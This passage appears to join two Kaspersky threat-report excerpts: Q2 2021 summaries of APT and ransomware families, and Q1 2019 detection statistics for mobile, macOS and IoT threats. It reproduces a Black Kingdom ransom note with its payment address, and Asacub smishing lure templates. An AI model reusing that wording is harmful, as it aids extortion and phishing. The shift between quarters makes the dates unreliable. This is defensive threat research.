then, one of its implants [has been analyzed](<http://www.hackdig.com/03/hack-293629.htm>) by a Chinese threat intelligence firm.\n\nWe were able to expand on some of the findings about the group and provide insights into the additional variants that it uses. 
The malware dropped from the lure document, dubbed "MarkiRAT", records keystrokes, clipboard content, and provides file download and upload capabilities as well as the ability to execute arbitrary commands on the victim's computer. We were able to trace the implant back to at least 2015, along with variants intended to hijack the execution of Telegram and Chrome applications as a persistence method.\n\nFerocious Kitten is one of the groups that operate in a wider eco-system intended to track individuals in Iran. Such threat groups aren't reported very often; and so are able to re-use infrastructure and toolsets without worrying about them being taken down or flagged by security solutions. Some of the TTPs used by this threat actor are reminiscent of other groups that are active against a similar set of targets, such as Domestic Kitten and Rampant Kitten.\n\n## Other malware\n\n### Evolution of JSWorm ransomware\n\nWhile ransomware has been around for a long time, it has evolved over time as attackers have improved their technologies and refined their tactics. We have seen a shift away from the random, speculative attacks of five years ago, and even from the massive outbreaks such as [WannaCry](<https://securelist.com/wannacry-faq-what-you-need-to-know-today/78411/>) and [NotPetya](<https://securelist.com/expetrpetyanotpetya-is-a-wiper-not-ransomware/78902/>). Many ransomware gangs have switched to the more profitable tactic of "big-game hunting"; and news of ransomware attacks affecting large corporations, and even critical infrastructure installations, has become commonplace. 
Moreover, there's now a [well-developed eco-system underpinning ransomware attacks](<https://securelist.com/ransomware-world-in-2021/102169/>).

As a result, even though [the number of ransomware attacks has fallen](<https://securelist.com/ransomware-by-the-numbers-reassessing-the-threats-global-impact/101965/>), and individuals are probably less likely to encounter ransomware than a few years ago, the threat to organizations is greater than ever.

We recently published an analysis of one such ransomware family, named [JSWorm](<https://securelist.com/evolution-of-jsworm-ransomware/102428/>). This malware was discovered in 2019, and since then different variants have gained notoriety under various names such as Nemty, Nefilim, Offwhite and others.

![](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24115814/JSworm_malware_01.png>)

Each "re-branded" version has included alterations to different aspects of the code – file extensions, cryptographic schemes, encryption keys, programming language and distribution model. Since it emerged, JSWorm has developed from a typical mass-scale ransomware threat affecting mostly individual users into a typical big-game hunting ransomware threat attacking high-profile targets and demanding massive ransom payments.

### Black Kingdom ransomware

[Black Kingdom](<https://securelist.com/black-kingdom-ransomware/102873/>) first appeared in 2019; in 2020 the group was observed exploiting vulnerabilities (such as CVE-2019-11510) in its attacks. In recent activity, the ransomware was used by an unknown adversary for exploiting a Microsoft Exchange vulnerability (CVE-2021-27065, aka [ProxyLogon](<https://proxylogon.com/>)). This ransomware family is much less sophisticated than other [Ransomware-as-a-Service](<https://encyclopedia.kaspersky.com/glossary/ransomware-as-a-service-raas/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) (RaaS) or big-game hunting families. The group's involvement in the Microsoft Exchange exploitation campaign suggests opportunism rather than a resurgence in activity from this ransomware family.

The malware is coded in Python and compiled to an executable using PyInstaller. The ransomware supports two encryption modes: one with a dynamically generated key and one using a hardcoded key. Code analysis revealed an amateurish development cycle and the possibility of recovering files that have been encrypted with Black Kingdom with the help of the hardcoded key. At the time of analysis, there was already a [script to recover files encrypted with the embedded key](<https://blog.cyberint.com/black-kingdom-ransomware>).

Black Kingdom changes the desktop background to a note that the system is infected while it encrypts files, disabling the mouse and keyboard as it does so. The ransom note reads (reproduced verbatim):

```
***************************
| We Are Back ?
***************************

We hacked your (( Network )), and now all files, documents, images,
databases and other important data are safely encrypted using the strongest algorithms ever.
You cannot access any of your files or services .
But do not worry. You can restore everthing and get back business very soon ( depends on your actions )

before I tell how you can restore your data, you have to know certain things :

We have downloaded most of your data ( especially important data ) , and if you don't contact us within 2 days, your data will be released to the public.

To see what happens to those who didn't contact us, just google : ( Blackkingdom Ransomware )

***************************
| What guarantees ?
***************************

We understand your stress and anxiety. So you have a free opportunity to test our service by instantly decrypting one or two files for free
just send the files you want to decrypt to (support_blackkingdom2@protonmail.com

***************************************************
| How to contact us and recover all of your files ?
***************************************************

The only way to recover your files and protect from data leaks, is to purchase a unique private key for you that we only posses .


[ + ] Instructions:

1- Send the decrypt_file.txt file to the following email ===> support_blackkingdom2@protonmail.com

2- send the following amount of US dollars ( 10,000 ) worth of bitcoin to this address :

[ 1Lf8ZzcEhhRiXpk6YNQFpCJcUisiXb34FT ]

3- confirm your payment by sending the transfer url to our email address

4- After you submit the payment, the data will be removed from our servers, and the decoder will be given to you,
so that you can recover all your files.

## Note ##

Dear system administrators, do not think you can handle it on your own. Notify your supervisors as soon as possible.
By hiding the truth and not communicating with us, what happened will be published on social media and yet in news websites.

Your ID ==>
FDHJ91CUSzXTquLpqAnP
```

After decompiling the Python code, we discovered that the code base for Black Kingdom has its origins in an open-source ransomware builder [available on GitHub](<https://github.com/BuchiDen/Ransomware_RAASNet/blob/master/RAASNet.py>). The group adapted parts of the code, adding features that were not originally present in the builder, such as the hardcoded key. We were not able to attribute Black Kingdom to any known threat group.

Based on our telemetry, we could see only a few hits by Black Kingdom in Italy and Japan.

### Gootkit: the cautious banking Trojan

[Gootkit](<https://securelist.com/gootkit-the-cautious-trojan/102731/>) belongs to a class of Trojans that are extremely tenacious, but not widespread. Since it's not very common, new versions of the Trojan may remain under the researchers' radar for long periods.

It is complex multi-stage banking malware, which was initially discovered by Doctor Web in 2014. Initially, it was distributed via spam and exploit kits such as Spelevo and RIG. In conjunction with spam campaigns, the adversaries later switched to compromised websites where visitors are tricked into downloading the malware.

Gootkit is capable of stealing data from the browser, performing man-in-the-browser attacks, keylogging, taking screenshots, and lots of other malicious actions. The Trojan's loader performs various virtual machine and sandbox checks and uses sophisticated persistence algorithms.

In 2019, Gootkit stopped operating after it experienced a [data leak](<https://www.zdnet.com/article/gootkit-malware-crew-left-their-database-exposed-online-without-a-password/>), but has been [active again](<https://www.bleepingcomputer.com/news/security/gootkit-malware-returns-to-life-alongside-revil-ransomware/>) since November 2020. Most of the victims are located in EU countries such as Germany and Italy.

### Bizarro banking Trojan expands into Europe

Bizarro is one more banking Trojan family originating from Brazil that is now found in other parts of the world. We have seen people being targeted in Spain, Portugal, France and Italy.
This malware has been used to steal credentials from customers of 70 banks from different European and South American countries.

![](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/14143631/Bizarro_trojan_13.png>)

As with [Tetrade](<https://securelist.com/the-tetrade-brazilian-banking-malware/97779/>), Bizarro uses affiliates or recruits money mules to cash out or simply to help with money transfers.

Bizarro is distributed via MSI packages downloaded by victims from links in spam emails. Once launched, it downloads a ZIP archive from a compromised website. We observed hacked WordPress, Amazon and Azure servers used by the Trojan for storing archives. The backdoor, which is the core component of Bizarro, contains more than 100 commands and allows the attackers to steal online banking account credentials. Most of the commands are used to display fake pop-up messages that seek to trick people into entering two-factor authentication codes. The Trojan may also use social engineering to convince victims to download a smartphone app.

![](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/14143359/Bizarro_trojan_12.png>)

Bizarro is one of several banking Trojans from South America that have extended their operations into other regions – mainly Europe. They include Guildma, Javali, Melcoz, Grandoreiro and Amavaldo.

![](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/17095011/Map_of_Brazilian_families.jpeg>)

### Malicious code in APKPure app

In early April, we [discovered malicious code in version 3.17.18 of the official client of the APKPure app store](<https://securelist.com/apkpure-android-app-store-infected/101845/>), a popular alternative source of Android apps. [The incident seems to be similar to what happened with CamScanner](<https://www.kaspersky.com/blog/camscanner-malicious-android-app/28156/>), when the app's developer implemented an adware SDK from an unverified source.

When launched, the embedded Trojan dropper, which our solutions detect as HEUR:Trojan-Dropper.AndroidOS.Triada.ap, unpacks and runs its payload, which is able to show ads on the lock screen, open browser tabs, collect information about the device, and download other malicious code. The Trojan downloaded depends on the version of Android and how recently security updates have been installed. In the case of relatively recent versions of the operating system (Android 8 or higher) it loads additional modules for the [Triada Trojan](<https://www.kaspersky.com/blog/triada-trojan/11481/>). If the device is older (Android 6 or 7, and without security updates installed) it could be the [xHelper Trojan](<https://securelist.com/unkillable-xhelper-and-a-trojan-matryoshka/96487/>).

We reported the issue to APKPure on April 8. APKPure acknowledged the problem the following day and, soon afterwards, posted a new version (3.17.19) that does not contain the malicious component.

### Browser lockers

Browser lockers are designed to prevent the victim from using their browser unless they pay a ransom. The "locking" consists of preventing the victim from leaving the current tab, which displays intimidating messages, often with sound and visual effects. The locker tries to trick the victim into making a payment with threats of losing data or legal liability.

This type of fraud has long been on the radar of researchers, and over the last decade there have been numerous browser locking campaigns targeting people worldwide. The tricks used by the scammers include imitating the infamous "[Blue Screen of Death](<https://encyclopedia.kaspersky.com/glossary/blue-screen-of-death-bsod/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>)" (BSOD) in the browser, false warnings about system errors or detected malware, threats to encrypt files and legal liability notices.

In our [report on browser lockers](<https://securelist.com/browser-lockers-extortion-disguised-as-a-fine/101735/>), we examined two families of lockers that mimic government websites.

![](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/01145253/MVD_fake_sites_07-scaled.jpeg>)

Both families spread mainly via advertising networks, primarily aimed at selling "adult" content and movies in an intrusive manner; for example, through tabs or windows that open on top of the visited site when loading a page with an embedded ad module (pop-ups), or after clicking anywhere on the page (click-unders).

These threats are not technically complex: they simply aim to create the illusion of having locked the computer and intimidate victims into paying money. Landing on such a page by mistake will not harm your device or compromise your data, as long as you don't fall for the cybercriminals' smoke-and-mirrors tactics.

### Malware targets Apple M1 chip

Last November, Apple unveiled its M1 chip. The new chip, which has replaced Intel processors in several of its products, is based on the ARM architecture instead of the x86 architecture traditionally used in personal computers. This lays the foundation for Apple to switch completely to its own processors and unify its software under a single architecture. Unfortunately, just months after the release, [malware writers had already adapted several malware families to the new processor](<https://securelist.com/malware-for-the-new-apple-silicon-platform/101137/>).

### Attempted supply-chain attack using PHP

In March, [unknown attackers tried to carry out a supply-chain attack by introducing malicious code to the PHP scripting language](<https://www.kaspersky.com/blog/php-git-backdor/39191/>). The developers of PHP make changes to the code using a common repository built on the Git version control system. The attackers tried to add a backdoor to the code. Fortunately, a developer noticed something suspicious during a routine check. Had they not done so, the backdoor might have allowed attackers to run malicious code remotely on web servers, around 80 per cent of which use PHP.

_Source: Securelist, "IT threat evolution Q2 2021", published 2021-08-12, <https://securelist.com/it-threat-evolution-q2-2021/103597/>. CVEs referenced: CVE-2018-0802, CVE-2019-11510, CVE-2021-1732, CVE-2021-27065, CVE-2021-28310, CVE-2021-31955, CVE-2021-31956._

---

_These statistics are based on detection verdicts of Kaspersky Lab products received from users who consented to provide statistical data._

## Quarterly figures

According to Kaspersky Security Network,

 * Kaspersky Lab solutions blocked 843,096,461 attacks launched from online resources in 203 countries across the globe.
 * 113,640,221 unique URLs were recognized as malicious by Web Anti-Virus components.
 * Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 243,604 users.
 * Ransomware attacks were defeated on the computers of 284,489 unique users.
 * Our File Anti-Virus detected 247,907,593 unique malicious and potentially unwanted objects.
 * Kaspersky Lab products for mobile devices detected:
   * 905,174 malicious installation packages
   * 29,841 installation packages for mobile banking Trojans
   * 27,928 installation packages for mobile ransomware Trojans

## Mobile threats

### Quarterly highlights

Q1 2019 is remembered mainly for mobile financial threats.

First, the operators of the Russia-targeting Asacub Trojan made several large-scale distribution attempts, reaching up to 13,000 unique users per day. The attacks used active bots to send malicious links to contacts in already infected smartphones.
The mailings contained one of the following messages:

 * _{Name of victim}, you received a new mms: ____________________________ from {Name of victim's contact}_
 * _{Name of victim}, the mms: smsfn.pro/3ftjR was received from {Name of victim's contact}_
 * _{Name of victim}, photo: smslv.pro/c0Oj0 received from {Name of victim's contact}_
 * _{Name of victim}, you have an mms notification ____________________________ from {Name of victim's contact}_

Second, the start of the year saw a rise in the number of malicious apps in the Google Play store aimed at stealing credentials from users of Brazilian online banking apps.

![](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172941/it-threat-stats-q1-2019-1.png>)

Although such malware appeared on the most popular app platform, the number of downloads was extremely low. We are inclined to believe that cybercriminals are having problems luring victims to pages with malicious apps.

### Mobile threat statistics

In Q1 2019, Kaspersky Lab detected 905,174 malicious installation packages, which is 95,845 packages down on the previous quarter.

_Number of detected malicious installation packages, Q2 2018 – Q1 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171046/mobile-malware-apk.png>)

#### Distribution of detected mobile apps by type

_Distribution of newly detected mobile apps by type, Q4 2018 and Q1 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171122/infographic.png>)

Among all the threats detected in Q1 2019, the lion's share went to potentially unsolicited RiskTool apps with 29.80%, a fall of 19 p.p. against the previous quarter. The most frequently encountered objects came from the RiskTool.AndroidOS.Dnotua (28% of all detected threats of this class), RiskTool.AndroidOS.Agent (27%), and RiskTool.AndroidOS.SMSreg (16%) families.

In second place were threats in the Trojan-Dropper class (24.93%), whose share increased by 13 p.p. The vast majority of files detected belonged to the Trojan-Dropper.AndroidOS.Wapnor family (93% of all detected threats of this class). Next came the Trojan-Dropper.AndroidOS.Agent (3%) and Trojan-Dropper.AndroidOS.Hqwar (2%) families, and others.

The share of advertising apps (adware) doubled compared to Q4 2018. The AdWare.AndroidOS.Agent (44.44% of all threats of this class), AdWare.AndroidOS.Ewind (35.93%), and AdWare.AndroidOS.Dnotua (4.73%) families were the biggest contributors.

The statistics show a significant rise in the number of mobile financial threats in Q1 2019. Whereas in Q4 2018 the share of mobile banking Trojans was 1.85%, in Q1 2019 the figure stood at 3.24% of all detected threats.

The most frequently created objects belonged to the Trojan-Banker.AndroidOS.Svpeng (20% of all detected mobile bankers), Trojan-Banker.AndroidOS.Asacub (18%), and Trojan-Banker.AndroidOS.Agent (15%) families.

### Top 20 mobile malware programs

_Note that this malware rating does not include potentially dangerous or unwanted programs such as RiskTool and Adware._

| | **Verdict** | **%*** |
|---|---|---|
| 1 | DangerousObject.Multi.Generic | 54.26 |
| 2 | Trojan.AndroidOS.Boogr.gsh | 12.72 |
| 3 | Trojan-Banker.AndroidOS.Asacub.snt | 4.98 |
| 4 | DangerousObject.AndroidOS.GenericML | 4.35 |
| 5 | Trojan-Banker.AndroidOS.Asacub.a | 3.49 |
| 6 | Trojan-Dropper.AndroidOS.Hqwar.bb | 3.36 |
| 7 | Trojan-Dropper.AndroidOS.Lezok.p | 2.60 |
| 8 | Trojan-Banker.AndroidOS.Agent.ep | 2.53 |
| 9 | Trojan.AndroidOS.Dvmap.a | 1.84 |
| 10 | Trojan-Banker.AndroidOS.Svpeng.q | 1.83 |
| 11 | Trojan-Banker.AndroidOS.Asacub.cp | 1.78 |
| 12 | Trojan.AndroidOS.Agent.eb | 1.74 |
| 13 | Trojan.AndroidOS.Agent.rt | 1.72 |
| 14 | Trojan-Banker.AndroidOS.Asacub.ce | 1.70 |
| 15 | Trojan-SMS.AndroidOS.Prizmes.a | 1.66 |
| 16 | Exploit.AndroidOS.Lotoor.be | 1.59 |
| 17 | Trojan-Dropper.AndroidOS.Hqwar.gen | 1.57 |
| 18 | Trojan-Dropper.AndroidOS.Tiny.d | 1.51 |
| 19 | Trojan-Banker.AndroidOS.Svpeng.ak | 1.49 |
| 20 | Trojan.AndroidOS.Triada.dl | 1.47 |

_* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab's mobile security solutions that were attacked._

As is customary, first place in the Top 20 for Q1 went to the DangerousObject.Multi.Generic verdict (54.26%), which we use for malware detected using [cloud technologies](<https://www.kaspersky.com/enterprise-security/wiki-section/products/big-data-the-astraea-technology>). Cloud technologies are deployed when the antivirus databases lack data for detecting a piece of malware, but the company's cloud already contains information about the object. This is basically how the latest malicious programs are detected.

In second place came Trojan.AndroidOS.Boogr.gsh (12.72%). This verdict is assigned to files recognized as malicious by our system [based on machine learning](<https://www.kaspersky.com/enterprise-security/wiki-section/products/machine-learning-in-cybersecurity>).

Third place went to the Trojan-Banker.AndroidOS.Asacub.snt banker (4.98%). In Q1, this family was well represented in our Top 20: four positions out of 20 (3rd, 5th, 11th, 14th).

The DangerousObject.AndroidOS.GenericML verdict (4.35%), which ranked fourth in Q1, is perhaps the most interesting. It is given to files detected by machine learning. But unlike the Trojan.AndroidOS.Boogr.gsh verdict, which is assigned to malware that is processed and detected inside Kaspersky Lab's infrastructure, the DangerousObject.AndroidOS.GenericML verdict is given to files on the side of users of the company's security solutions before such files go for processing. The latest threat patterns are now detected this way.

Sixth and seventeenth places were taken by members of the Hqwar dropper family: Trojan-Dropper.AndroidOS.Hqwar.bb (3.36%) and Trojan-Dropper.AndroidOS.Hqwar.gen (1.57%), respectively. These packers most often contain banking Trojans, including Asacub.

Seventh position belonged to Trojan-Dropper.AndroidOS.Lezok.p (2.60%). The Lezok family is notable for its variety of distribution schemes, among them a supply chain attack, whereby the malware is sewn into the firmware of the mobile device before delivery to the store. This is very dangerous for two reasons:

 * It is extremely difficult for an ordinary user to determine whether their device is already infected.
 * Getting rid of such malware is highly complex.

The Lezok Trojan family is designed primarily to display persistent ads, sign users up for paid SMS subscriptions, and inflate counters for apps on various platforms.

The last Trojan worthy of a mention on the topic of the Top 20 mobile threats is Trojan-Banker.AndroidOS.Agent.ep. It is encountered both in standalone form and inside Hqwar droppers. The malware has extensive capabilities for countering dynamic analysis, and can detect being launched in the Android Emulator or Genymotion environment. It can open arbitrary web pages to phish for login credentials.
It uses Accessibility Services to obtain various rights and interact with other apps.\n\n### Geography of mobile threats\n\n_Map of mobile malware infection attempts, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172806/en-mobile-malware-map.png>)\n\nTop 10 countries by share of users attacked by mobile malware:\n\n| Country* | %** \n---|---|--- \n1 | Pakistan | 37.54 \n2 | Iran | 31.55 \n3 | Bangladesh | 28.38 \n4 | Algeria | 24.03 \n5 | Nigeria | 22.59 \n6 | India | 21.53 \n7 | Tanzania | 20.71 \n8 | Indonesia | 17.16 \n9 | Kenya | 16.27 \n10 | Mexico | 12.01 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000)._ \n_** Unique users attacked in the country as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._\n\nPakistan (37.54%) ranked first, with the largest number of users in this country being attacked by AdWare.AndroidOS.Agent.f, AdWare.AndroidOS.Ewind.h, and AdWare.AndroidOS.HiddenAd.et adware.\n\nSecond place was taken by Iran (31.55%), which appears consistently in the Top 10 every quarter. The most commonly encountered malware in this country was Trojan.AndroidOS.Hiddapp.bn, as well as the potentially unwanted apps RiskTool.AndroidOS.Dnotua.yfe and RiskTool.AndroidOS.FakGram.a. Of these three, the latter is the most noteworthy \u2013 the main task of this app is to intercept Telegram messages. 
It should be mentioned that Telegram is banned in Iran, so any of its clones are in demand, as confirmed by the infection statistics.\n\nThird place went to Bangladesh (28.38%), where in Q1 the same advertising apps were weaponized as in Pakistan.\n\n### Mobile banking Trojans\n\nIn the reporting period, we detected **29,841** installation packages for mobile banking Trojans, almost 11,000 more than in Q4 2018.\n\nThe greatest contributions came from the creators of the Trojan-Banker.AndroidOS.Svpeng (20% of all detected banking Trojans), the second-place Trojan-Banker.AndroidOS.Asacub (18%), and the third-place Trojan-Banker.AndroidOS.Agent (15%) families.\n\n_Number of installation packages for mobile banking Trojans, Q2 2018 \u2013 Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171308/banking-malware-apk.png>)\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Banker.AndroidOS.Asacub.snt | 23.32 \n2 | Trojan-Banker.AndroidOS.Asacub.a | 16.35 \n3 | Trojan-Banker.AndroidOS.Agent.ep | 11.82 \n4 | Trojan-Banker.AndroidOS.Svpeng.q | 8.57 \n5 | Trojan-Banker.AndroidOS.Asacub.cp | 8.33 \n6 | Trojan-Banker.AndroidOS.Asacub.ce | 7.96 \n7 | Trojan-Banker.AndroidOS.Svpeng.ak | 7.00 \n8 | Trojan-Banker.AndroidOS.Agent.eq | 4.96 \n9 | Trojan-Banker.AndroidOS.Asacub.ar | 2.47 \n10 | Trojan-Banker.AndroidOS.Hqwar.t | 2.10 \n \n_* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab's mobile security solutions that were attacked by banking threats._\n\nThis time, fully half the Top 10 banking threats are members of the Trojan-Banker.AndroidOS.Asacub family: five positions out of ten. The creators of this Trojan actively distributed samples throughout Q1. In particular, the number of users attacked by the Asacub.cp Trojan reached 8,200 per day. 
But even this high result was surpassed by Asacub.snt with 13,000 users per day at the peak of the campaign.\n\nIt was a similar story with Trojan-Banker.AndroidOS.Agent.ep: We recorded around 3,000 attacked users per day at its peak. However, by the end of the quarter, the average daily number of attacked unique users had dropped below 1,000. Most likely, this was due not to decreased demand for the Trojan, but to cybercriminals' transition to a two-stage system of infection using Hqwar droppers.\n\n_Geography of mobile banking threats, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171335/en-banking-malware-map.png>)\n\n**Top 10 countries by share of users attacked by mobile banking Trojans:**\n\n| Country* | %** \n---|---|--- \n1 | Australia | 0.81 \n2 | Turkey | 0.73 \n3 | Russia | 0.64 \n4 | South Africa | 0.35 \n5 | Ukraine | 0.31 \n6 | Tajikistan | 0.25 \n7 | Armenia | 0.23 \n8 | Kyrgyzstan | 0.17 \n9 | US | 0.16 \n10 | Moldova | 0.16 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000)._ \n_** Unique users attacked by mobile banking Trojans as a percentage of all users of Kaspersky Lab's mobile security solutions in this country._\n\nIn Q1 2019, Australia (0.81%) took first place in our Top 10. The most common infection attempts we registered in this country were by Trojan-Banker.AndroidOS.Agent.eq and Trojan-Banker.AndroidOS.Agent.ep. 
Neither type of malware is exclusive to Australia; both are used in attacks worldwide.

Second place was taken by Turkey (0.73%), where, as in Australia, Trojan-Banker.AndroidOS.Agent.ep was most often detected.

Russia is in third place (0.64%), where we most frequently detected malware from the Asacub and Svpeng families.

### Mobile ransomware

In Q1 2019, we detected **27,928** installation packages of mobile ransomware, which is 3,900 more than in the previous quarter.

_Number of mobile ransomware installation packages detected by Kaspersky Lab (Q2 2018 – Q1 2019)_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171455/mobile-ransomware.png>)

| | Verdict | %* |
|---|---|---|
| 1 | Trojan-Ransom.AndroidOS.Svpeng.ah | 28.91 |
| 2 | Trojan-Ransom.AndroidOS.Rkor.h | 19.42 |
| 3 | Trojan-Ransom.AndroidOS.Svpeng.aj | 9.46 |
| 4 | Trojan-Ransom.AndroidOS.Small.as | 8.81 |
| 5 | Trojan-Ransom.AndroidOS.Rkor.snt | 5.36 |
| 6 | Trojan-Ransom.AndroidOS.Svpeng.ai | 5.21 |
| 7 | Trojan-Ransom.AndroidOS.Small.o | 3.24 |
| 8 | Trojan-Ransom.AndroidOS.Fusob.h | 2.74 |
| 9 | Trojan-Ransom.AndroidOS.Small.ce | 2.49 |
| 10 | Trojan-Ransom.AndroidOS.Svpeng.snt | 2.33 |

_* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab's mobile security solutions that were attacked by ransomware._

In Q1 2019, the most common mobile ransomware family was Svpeng, with four positions in the Top 10.

_Geography of mobile ransomware, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171523/en-mobile-ransomware-map.png>)

**Top 10 countries by share of users attacked by mobile ransomware:**

| | Country* | %** |
|---|---|---|
| 1 | US | 1.54 |
| 2 | Kazakhstan | 0.36 |
| 3 | Iran | 0.28 |
| 4 | Pakistan | 0.14 |
| 5 | Mexico | 0.10 |
| 6 | Saudi Arabia | 0.10 |
| 7 | Canada | 0.07 |
| 8 | Italy | 0.07 |
| 9 | Indonesia | 0.05 |
| 10 | Belgium | 0.05 |

_* Excluded from the rating are countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000)._
_** Unique users attacked by mobile ransomware as a percentage of all users of Kaspersky Lab's mobile security solutions in this country._

The Top 3 countries by number of users attacked by mobile ransomware were, as in the previous quarter, the US (1.54%), Kazakhstan (0.36%), and Iran (0.28%).

## Attacks on Apple macOS

On the topic of threats to various platforms, a system as popular as macOS cannot be ignored. Although new malware families for this platform are relatively rare, threats do exist for it, largely in the shape of adware.

The modus operandi of such apps is widely known: infect the victim, take root in the system, and show advertising banners. For each ad displayed and banner clicked the attackers receive a very modest fee, so they need:

 1. The code that displays the advertising banner to run as often as possible on the infected machine,
 2. The victim to click on the banners as often as possible,
 3. As many victims as possible.

It should be noted that the adware infection technique and adware behavior on the infected machine at times differ little from malware.
Meanwhile, the banners themselves can be shown in an arbitrary place on the screen at any time, be it in an open browser window, in a separate window in the center of the screen, etc.

### Top 20 threats for macOS

| | Verdict | %* |
|---|---|---|
| 1 | Trojan-Downloader.OSX.Shlayer.a | 24.62 |
| 2 | AdWare.OSX.Spc.a | 20.07 |
| 3 | AdWare.OSX.Pirrit.j | 10.31 |
| 4 | AdWare.OSX.Pirrit.p | 8.44 |
| 5 | AdWare.OSX.Agent.b | 8.03 |
| 6 | AdWare.OSX.Pirrit.o | 7.45 |
| 7 | AdWare.OSX.Pirrit.s | 6.88 |
| 8 | AdWare.OSX.Agent.c | 6.03 |
| 9 | AdWare.OSX.MacSearch.a | 5.95 |
| 10 | AdWare.OSX.Cimpli.d | 5.72 |
| 11 | AdWare.OSX.Mcp.a | 5.71 |
| 12 | AdWare.OSX.Pirrit.q | 5.55 |
| 13 | AdWare.OSX.MacSearch.d | 4.48 |
| 14 | AdWare.OSX.Agent.a | 4.39 |
| 15 | Downloader.OSX.InstallCore.ab | 3.88 |
| 16 | AdWare.OSX.Geonei.ap | 3.75 |
| 17 | AdWare.OSX.MacSearch.b | 3.48 |
| 18 | AdWare.OSX.Geonei.l | 3.42 |
| 19 | AdWare.OSX.Bnodlero.q | 3.33 |
| 20 | RiskTool.OSX.Spigot.a | 3.12 |

_* Unique users attacked by this malware as a percentage of all users of Kaspersky Lab's security solutions for macOS that were attacked._

Trojan-Downloader.OSX.Shlayer.a (24.62%) finished first in our ranking of macOS threats. Malware from the Shlayer family is distributed under the guise of Flash Player or its updates. Its main task is to download and install various advertising apps, including Bnodlero.

AdWare.OSX.Spc.a (20.07%) and AdWare.OSX.Mcp.a (5.71%) are typical adware apps that are distributed together with various "cleaner" programs for macOS. After installation, they add themselves to the autoloader and run in the background.

Members of the AdWare.OSX.Pirrit family add extensions to the victim's browser; some versions also install a proxy server on the victim's machine to intercept traffic from the browser.
All this serves one purpose – to inject advertising into web pages viewed by the user.

The malware group consisting of AdWare.OSX.Agent.a, AdWare.OSX.Agent.b, and AdWare.OSX.Agent.c is closely related to the Pirrit family, since it often downloads members of the latter. It can download, unpack, and launch different files, as well as embed JS code with ads into web pages seen by the victim.

AdWare.OSX.MacSearch is another family of advertising apps with extensive tools for interacting with the victim's browser. It can manipulate the browser history (read/write), change the browser search system to its own, add extensions, and embed advertising banners on pages viewed by the user. It can also download and install other apps without the user's knowledge.

AdWare.OSX.Cimpli.d (5.72%) is able to download and install other advertising apps, but its main purpose is to change the browser home page and install advertising extensions. As with other adware apps, all these actions have the aim of displaying ads in the victim's browser.

The creators of the not-a-virus:Downloader.OSX.InstallCore family, having long perfected their tricks on Windows, transferred the same techniques to macOS. The typical InstallCore member is in fact an installer (more precisely, a framework for creating an installer with extensive capabilities) of other programs that do not form part of the main InstallCore package and are downloaded separately. Besides legitimate software, it can distribute less salubrious apps, including ones containing aggressive advertising. Among other things, InstallCore is used to distribute DivX Player.

The AdWare.OSX.Geonei family is one of the oldest adware families for macOS. It employs its creators' own obfuscation techniques to counteract security solutions.
As is typical for adware programs, its main task is to display ads in the browser by embedding them in the HTML code of the web page.

Like other similar apps, AdWare.OSX.Bnodlero.q (3.33%) installs advertising extensions in the user's browser, and changes the default search engine and home page. What's more, it can download and install other advertising apps.

### Threat geography

| | Country* | %** |
|---|---|---|
| 1 | France | 11.54 |
| 2 | Spain | 9.75 |
| 3 | India | 8.83 |
| 4 | Italy | 8.20 |
| 5 | US | 8.03 |
| 6 | Canada | 7.94 |
| 7 | UK | 7.52 |
| 8 | Russia | 7.51 |
| 9 | Brazil | 7.45 |
| 10 | Mexico | 6.99 |

_* Excluded from the rating are countries with relatively few users of Kaspersky Lab's security solutions for macOS (under 10,000)._
_** Unique attacked users as a percentage of all users of Kaspersky Lab's security solutions for macOS in the country._

In Q1 2019, France (11.54%) took first place in the Top 10. The most common infection attempts we registered in this country came from Trojan-Downloader.OSX.Shlayer.a, AdWare.OSX.Spc.a and AdWare.OSX.Bnodlero.q.

Users from Spain (9.75%), India (8.83%), and Italy (8.20%) – who ranked second, third, and fourth, respectively – most often encountered Trojan-Downloader.OSX.Shlayer.a, AdWare.OSX.Spc.a, AdWare.OSX.Bnodlero.q, AdWare.OSX.Pirrit.j, and AdWare.OSX.Agent.b.

Fifth place in the ranking went to the US (8.03%), which saw the same macOS threats as Europe. Note that US residents also had to deal with advertising apps from the Cimpli family.

## IoT attacks

### Interesting events

In Q1 2019, we noticed several curious features in the behavior of IoT malware. First, some Mirai samples were equipped with a tool for artificial environment detection: if the malware detected it was running in a sandbox, it stopped working.
The implementation was primitive – scanning for the presence of procfs.

[ (image)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172955/it-threat-stats-q1-2019-6.png>)

But we expect it to become more complex in the near future.

Second, one version of Mirai was found to contain a mechanism for clearing the environment of other bots. It works using templates, killing a process if its name matches one of the templates. Interestingly, Mirai itself ended up in the list of such names (the malware itself does not contain "mirai" in the process name):

 * dvrhelper
 * dvrsupport
 * **mirai**
 * blade
